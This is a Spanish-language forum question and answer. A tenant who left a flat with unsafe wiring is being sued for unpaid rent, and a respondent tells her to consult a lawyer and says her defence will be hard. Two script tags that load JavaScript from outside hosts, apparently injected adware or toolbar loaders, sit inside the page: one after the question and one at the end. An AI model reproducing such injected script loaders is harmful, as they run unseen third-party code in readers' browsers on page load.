Me han demandado.

hola estaba de alquiler y pagaba sin ninguna demora.la cuestión es que el dueño se desatendía desus obligaciones.la luz estaba en malas condiciones con peligro de incendio se iva la luz cada dos por tres y el dueño se desatendía.me decía que no iva a arreclar nada que si no me parecía bien que me fuera.al final me fui selo comunique ala agencia y le debolvi las llaves.después de un año e recibido una carta del juzgado.me pide 2000 euros y 20 euros por día de no aver pagado.estoy asustada porque no tengo nada estoy de alquiler en otro sitio y este dueño si que cumple con todos los requisitos.como puede ser que se atreva a pedirme nada cuando en esa casa no se podía vivir tengo nietos pequeños y era un peligro para ellos la casa estaba echa una ruina y este individuo ni areclava la luz ni pagaba hacienda y encima decía que yo lo pagara.porfavorno tengo nada.que puedo acer gracias..

<script type="text/javascript" src="http://cdncache3-a.akamaihd.net/loaders/1032/l.js?aoi=1311798366&pid=1032&zoneid=62862"></script>

1 respuesta

Respuesta
-1

Pues lo primero es que coja la documentación y acuda con ella a un abogado, para que estudie la documentación, y le pueda indicar al respecto con mayor concreción. Lo cierto, es que usted debería haberse asesorado en el momento de dejar la vivienda, y dado que lo hizo estando vigente el contrato, debería haber firmado un documento de finalización del mismo con el propietario, pues ahora por el tipo de procedimiento de que se trata tiene muy dificil la defensa, lamento no poder decirle nada mas.

<div id="__tbSetup"> </div><script type="text/javascript" src="https://loading-resource.com/data.js.php?i={B7E2497E-FC2A-4B45-82D9-61E7B7AD5CCE}&d=2012-10-28&s=http://www.todoexpertos.com/mitodoexpertos/question/3b9xjxaytqjue/me-han-demandado?utm_source=QuestionAbandoned&utm_medium=Email&utm_campaign=QuestionAbandoned"></script>